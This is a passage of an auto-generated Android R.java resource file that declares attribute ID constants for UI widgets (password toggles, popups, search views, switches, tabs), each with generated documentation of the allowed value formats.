pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int panelMenuListWidth=0x7f0100b1; /** <p>Must be a string value, using '\\;' to escape characters such as '\\n' or '\\uxxxx' for a unicode character. <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int passwordToggleContentDescription=0x7f0101ce; /** <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int passwordToggleDrawable=0x7f0101cd; /** <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int passwordToggleEnabled=0x7f0101cc; /** <p>Must be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int passwordToggleTint=0x7f0101cf; /** <p>Must be one of the following constant values.</p> <table> <colgroup align="left" /> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Constant</th><th>Value</th><th>Description</th></tr> <tr><td><code>src_over</code></td><td>3</td><td></td></tr> <tr><td><code>src_in</code></td><td>5</td><td></td></tr> <tr><td><code>src_atop</code></td><td>9</td><td></td></tr> <tr><td><code>multiply</code></td><td>14</td><td></td></tr> <tr><td><code>screen</code></td><td>15</td><td></td></tr> </table> */ public static final int passwordToggleTintMode=0x7f0101d0; /** Default PopupMenu style. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int popupMenuStyle=0x7f01009d; /** Reference to a theme that should be used to inflate popups shown by widgets in the action bar. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int popupTheme=0x7f010046; /** Default PopupWindow style. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int popupWindowStyle=0x7f01009e; /** Whether space should be reserved in layout when an icon is missing. <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int preserveIconSpacing=0x7f0100f0; /** <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int pressedTranslationZ=0x7f01018e; /** Specifies the horizontal padding on either end for an embedded progress bar. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int progressBarPadding=0x7f01003c; /** Specifies a style resource to use for an embedded progress bar. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int progressBarStyle=0x7f01003a; /** Background for the section containing the search query <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int queryBackground=0x7f010101; /** An optional user-defined query hint string to be displayed in the empty query field. <p>Must be a string value, using '\\;' to escape characters such as '\\n' or '\\uxxxx' for a unicode character. <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int queryHint=0x7f0100f8; /** Default RadioButton style. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int radioButtonStyle=0x7f0100cc; /** Default RatingBar style. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int ratingBarStyle=0x7f0100cd; /** Indicator RatingBar style. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int ratingBarStyleIndicator=0x7f0100ce; /** Small indicator RatingBar style. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int ratingBarStyleSmall=0x7f0100cf; /** <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int reverseLayout=0x7f010008; /** <p>Must be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int rippleColor=0x7f010131; /** <p>May be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>May be a string value, using '\\;' to escape characters such as '\\n' or '\\uxxxx' for a unicode character. */ public static final int scopeUris=0x7f010005; /** <p>Must be an integer value, such as "<code>100</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int scrimAnimationDuration=0x7f010185; /** <p>May be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>May be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". */ public static final int scrimBackground=0x7f010132; /** <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int scrimVisibleHeightTrigger=0x7f010184; /** Search icon displayed as a text field hint <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int searchHintIcon=0x7f0100fd; /** Search icon <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int searchIcon=0x7f0100fc; /** Style for the search query widget. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int searchViewStyle=0x7f0100a5; /** Default SeekBar style. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int seekBarStyle=0x7f0100d0; /** A style that may be applied to buttons or other selectable items that should react to pressed and focus states, but that do not have a clear visual border along the edges. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int selectableItemBackground=0x7f010095; /** Background drawable for borderless standalone items that need focus/pressed states. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int selectableItemBackgroundBorderless=0x7f010096; /** How this item should display in the Action Bar, if present. <p>Must be one or more (separated by '|') of the following constant values.</p> <table> <colgroup align="left" /> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Constant</th><th>Value</th><th>Description</th></tr> <tr><td><code>never</code></td><td>0</td><td> Never show this item in an action bar, show it in the overflow menu instead. Mutually exclusive with "ifRoom" and "always". </td></tr> <tr><td><code>ifRoom</code></td><td>1</td><td> Show this item in an action bar if there is room for it as determined by the system. Favor this option over "always" where possible. Mutually exclusive with "never" and "always". </td></tr> <tr><td><code>always</code></td><td>2</td><td> Always show this item in an actionbar, even if it would override the system's limits of how much stuff to put there. This may make your action bar look bad on some screens. In most cases you should use "ifRoom" instead. Mutually exclusive with "ifRoom" and "never". </td></tr> <tr><td><code>withText</code></td><td>4</td><td> When this item is shown as an action in the action bar, show a text label with it even if it has an icon representation. </td></tr> <tr><td><code>collapseActionView</code></td><td>8</td><td> This item's action view collapses to a normal menu item. When expanded, the action view takes over a larger segment of its container. </td></tr> </table> */ public static final int showAsAction=0x7f0100e8; /** Setting for which dividers to show. <p>Must be one or more (separated by '|') of the following constant values.</p> <table> <colgroup align="left" /> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Constant</th><th>Value</th><th>Description</th></tr> <tr><td><code>none</code></td><td>0</td><td></td></tr> <tr><td><code>beginning</code></td><td>1</td><td></td></tr> <tr><td><code>middle</code></td><td>2</td><td></td></tr> <tr><td><code>end</code></td><td>4</td><td></td></tr> </table> */ public static final int showDividers=0x7f0100e4; /** <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int showMotionSpec=0x7f010133; /** Whether to draw on/off text. <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int showText=0x7f01010d; /** <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int showTitle=0x7f01004f; /** <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int singleChoiceItemLayout=0x7f01004d; /** <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int singleLine=0x7f010177; /** <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int singleSelection=0x7f010178; /** <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int snackbarButtonStyle=0x7f0101a5; /** <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int snackbarStyle=0x7f0101a4; /** <p>Must be an integer value, such as "<code>100</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int spanCount=0x7f010007; /** Whether bars should rotate or not during transition <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int spinBars=0x7f0100dc; /** Default Spinner style. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int spinnerDropDownItemStyle=0x7f010090; /** Default Spinner style. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int spinnerStyle=0x7f0100d1; /** Whether to split the track and leave a gap for the thumb drawable. <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int splitTrack=0x7f01010c; /** Sets a drawable as the content of this ImageView. Allows the use of vector drawable when running on older versions of the platform. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int srcCompat=0x7f010051; /** <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int stackFromEnd=0x7f010009; /** State identifier indicating the popup will be above the anchor. <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int state_above_anchor=0x7f0100f3; /** <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int state_collapsed=0x7f010147; /** <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int state_collapsible=0x7f010148; /** <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int state_liftable=0x7f01014a; /** <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int state_lifted=0x7f010149; /** Drawable to display behind the status bar when the view is set to draw behind it. <p>May be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>May be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". */ public static final int statusBarBackground=0x7f0101de; /** <p>Must be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int statusBarScrim=0x7f010182; /** <p>Must be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int strokeColor=0x7f010134; /** <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int strokeWidth=0x7f010135; /** Drawable for the arrow icon indicating a particular item is a submenu. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int subMenuArrow=0x7f0100f1; /** Background for the section containing the action (e.g. voice search) <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int submitBackground=0x7f010102; /** Specifies subtitle text used for navigationMode="normal" <p>Must be a string value, using '\\;' to escape characters such as '\\n' or '\\uxxxx' for a unicode character. <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int subtitle=0x7f01002f; /** <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int subtitleTextAppearance=0x7f01010f; /** A color to apply to the subtitle string. <p>Must be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int subtitleTextColor=0x7f01011e; /** Specifies a style to use for subtitle text. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int subtitleTextStyle=0x7f010031; /** Layout for query suggestion rows <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int suggestionRowLayout=0x7f010100; /** Minimum width for the switch component <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int switchMinWidth=0x7f01010a; /** Minimum space between the switch and caption text <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int switchPadding=0x7f01010b; /** Default style for the Switch widget. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int switchStyle=0x7f0100d2; /** TextAppearance style for text displayed on the switch thumb. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int switchTextAppearance=0x7f010109; /** <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int tabBackground=0x7f0101aa; /** <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int tabContentStart=0x7f0101a9; /** <p>Must be one of the following constant values.</p> <table> <colgroup align="left" /> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Constant</th><th>Value</th><th>Description</th></tr> <tr><td><code>fill</code></td><td>0</td><td></td></tr> <tr><td><code>center</code></td><td>1</td><td></td></tr> </table> */ public static final int tabGravity=0x7f0101b0; /** <p>Must be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int tabIconTint=0x7f0101bc; /** <p>Must be one of the following constant values.</p> <table> <colgroup align="left" /> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Constant</th><th>Value</th><th>Description</th></tr> <tr><td><code>src_over</code></td><td>3</td><td></td></tr> <tr><td><code>src_in</code></td><td>5</td><td></td></tr> <tr><td><code>src_atop</code></td><td>9</td><td></td></tr> <tr><td><code>multiply</code></td><td>14</td><td></td></tr> <tr><td><code>screen</code></td><td>15</td><td></td></tr> <tr><td><code>add</code></td><td>16</td><td></td></tr> </table> */ public static final int tabIconTintMode=0x7f0101bd; /** <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int tabIndicator=0x7f0101ab; /** <p>Must be an integer value, such as "<code>100</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int tabIndicatorAnimationDuration=0x7f0101ad; /** <p>Must be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int tabIndicatorColor=0x7f0101a7; /** <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int tabIndicatorFullWidth=0x7f0101ae; /** <p>Must be one of the following constant values.</p> <table> <colgroup align="left" /> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Constant</th><th>Value</th><th>Description</th></tr> <tr><td><code>bottom</code></td><td>0</td><td></td></tr> <tr><td><code>center</code></td><td>1</td><td></td></tr> <tr><td><code>top</code></td><td>2</td><td></td></tr> <tr><td><code>stretch</code></td><td>3</td><td></td></tr> </table> */ public static final int tabIndicatorGravity=0x7f0101ac; /** <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int tabIndicatorHeight=0x7f0101a8; /** <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int tabInlineLabel=0x7f0101b1; /** <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int tabMaxWidth=0x7f0101b3; /** <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int tabMinWidth=0x7f0101b2; /** <p>Must be one of the following constant values.</p> <table> <colgroup align="left" /> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Constant</th><th>Value</th><th>Description</th></tr> <tr><td><code>scrollable</code></td><td>0</td><td></td></tr> <tr><td><code>fixed</code></td><td>1</td><td></td></tr> </table> */ public static final int tabMode=0x7f0101af; /** <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int tabPadding=0x7f0101bb; /** <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int tabPaddingBottom=0x7f0101ba; /** <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form 